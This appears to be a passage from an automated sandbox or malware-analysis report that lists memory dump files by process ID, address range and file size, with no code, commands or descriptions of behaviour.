                                                                    • memory/2020-50-0x0000000008210000-0x00000000087B4000-memory.dmp
                                                                      Filesize

                                                                      5.6MB

                                                                    • memory/2020-52-0x00000000087C0000-0x0000000008982000-memory.dmp
                                                                      Filesize

                                                                      1.8MB

                                                                    • memory/2020-53-0x0000000008EC0000-0x00000000093EC000-memory.dmp
                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/2352-207-0x0000000004BF0000-0x0000000004FF0000-memory.dmp
                                                                      Filesize

                                                                      4.0MB

                                                                    • memory/2352-199-0x0000000004BF0000-0x0000000004FF0000-memory.dmp
                                                                      Filesize

                                                                      4.0MB

                                                                    • memory/2352-174-0x0000000000580000-0x00000000005A8000-memory.dmp
                                                                      Filesize

                                                                      160KB

                                                                    • memory/2352-172-0x0000000000580000-0x00000000005A8000-memory.dmp
                                                                      Filesize

                                                                      160KB

                                                                    • memory/2352-173-0x0000000000580000-0x00000000005A8000-memory.dmp
                                                                      Filesize

                                                                      160KB

                                                                    • memory/2352-210-0x0000000075B50000-0x0000000075D65000-memory.dmp
                                                                      Filesize

                                                                      2.1MB

                                                                    • memory/2352-208-0x00007FFCCF470000-0x00007FFCCF665000-memory.dmp
                                                                      Filesize

                                                                      2.0MB

                                                                    • memory/3384-181-0x000001A189E30000-0x000001A189E52000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/3384-234-0x000001A1A4A70000-0x000001A1A4C32000-memory.dmp
                                                                      Filesize

                                                                      1.8MB

                                                                    • memory/3384-198-0x000001A1A4840000-0x000001A1A485C000-memory.dmp
                                                                      Filesize

                                                                      112KB

                                                                    • memory/3384-235-0x000001A1A5170000-0x000001A1A5698000-memory.dmp
                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/4164-170-0x0000024506030000-0x0000024506031000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/4552-211-0x0000000000FC0000-0x0000000000FC9000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/4552-213-0x0000000002CE0000-0x00000000030E0000-memory.dmp
                                                                      Filesize

                                                                      4.0MB

                                                                    • memory/4552-216-0x0000000075B50000-0x0000000075D65000-memory.dmp
                                                                      Filesize

                                                                      2.1MB

                                                                    • memory/4552-214-0x00007FFCCF470000-0x00007FFCCF665000-memory.dmp
                                                                      Filesize

                                                                      2.0MB